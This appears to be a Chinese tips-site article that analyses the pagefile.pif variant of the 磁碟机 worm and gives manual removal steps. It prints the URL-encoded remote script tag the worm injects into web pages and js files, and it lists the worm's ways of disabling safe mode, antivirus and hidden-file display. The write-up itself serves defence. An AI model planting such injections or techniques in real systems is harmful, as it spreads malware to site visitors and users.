网站地图
zenghuilan.com
生活小窍门 解释生活中的一切名词
pagefile.pif 发布于:

磁碟机新变种pagefile.pif,中毒后电脑突然卡或者电脑老是需要重新启动,提示"Generic host process for win32 services遇到问题需要关闭",打开任务管理器查看会发现有多个伪装的SVCHOST运行,并且有RUNDL132.EXE出现,最明显就是在D盘根目录下出现pagefile.pif和autorun.inf文件,硬盘里多了许多个pagefile.pif和autorun.inf,都是系统文件和隐藏性质。

1.病毒运行后,衍生如下文件或副本:

%systemroot%\system32\Com\LSASS.EXE

%systemroot%\system32\Com\netcfg.000

%systemroot%\system32\Com\netcfg.dll

%systemroot%\system32\Com\SMSS.EXE

C:\WINDOWS\system32\894729.log(6位随机数字)

C:\894729.log(6位随机数字)

C:\WINDOWS\system32\dnsq.dll

C:\WINDOWS\system32\ntfsus.exe

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe(一定不要忘记)

或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe

各个盘下面生成pagefile.pif和autorun.inf文件,达到通过移动存储传播的目的

2.添加启动项目

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe

3.通过查找某些ieframe和mozillauiwindowclass名关闭带有某些关键字的IE窗口和火狐浏览器窗口

还可能关闭带有某些关键字的进程

如avast

4.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面所有启动项目

5.删除HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\

把HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden的值改为0x00000000

使得不能显示隐藏文件

6.查找文件名中带有360字样的文件 找到即在重启后将其删除

7.通过ping百度网站查看是否联网

8.通过regsvr32.exe %systemroot%\system32\com\netcfg.dll /s注册netcfg.dll

9.连接网络下载Stop.exe到system32文件夹 命名为ntfsus.exe

该病毒具有arp欺骗功能

10.感染exe文件(部分感染)且会通过自解压命令感染Rar和zip文件中的exe文件

被感染文件运行后会释放一个文件名.log的文件

11.感染htm html、asp、spx、php、jsp等网页文件 在其后面加入

{script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"}{/script}的代码

感染.js文件

在其尾部加入

document.write("{ScRiPt src=''%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70''}{/sCrIpT}")

的代码

12.后台连接某些网站刷流量

(怕麻烦的话,可以直接使用磁碟机免疫工具

1.删除以下文件:

%systemroot%\system32\Com\LSASS.EXE

%systemroot%\system32\Com\netcfg.000

%systemroot%\system32\Com\netcfg.dll

%systemroot%\system32\Com\SMSS.EXE

C:\WINDOWS\system32\894729.log(6位随机数字)

C:\894729.log(6位随机数字)

C:\WINDOWS\system32\dnsq.dll

C:\WINDOWS\system32\ntfsus.exe

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe

2.重启计算机

打开sreng:系统修复 - Windows Shell/IE 全选 点击修复

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定

点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)

在左边的资源管理器中单击打开系统所在盘删除

C:\pagefile.pif

c:\autorun.inf

在左边的资源管理器中单击打开其他盘

删除pagefile.pif

autorun.inf

3.使用杀毒软件全盘杀毒 修复被感染的exe文件

4.修复被感染的htm等网页文件


相关文章推荐:
系统文件 | 「开始」菜单 | 「开始」菜单 | 移动存储 | 「开始」菜单 | 火狐浏览器 | zip文件 | 全选 | 我的电脑 | 文件夹选项 | 菜单栏 | 资源管理器 | 杀毒软件 |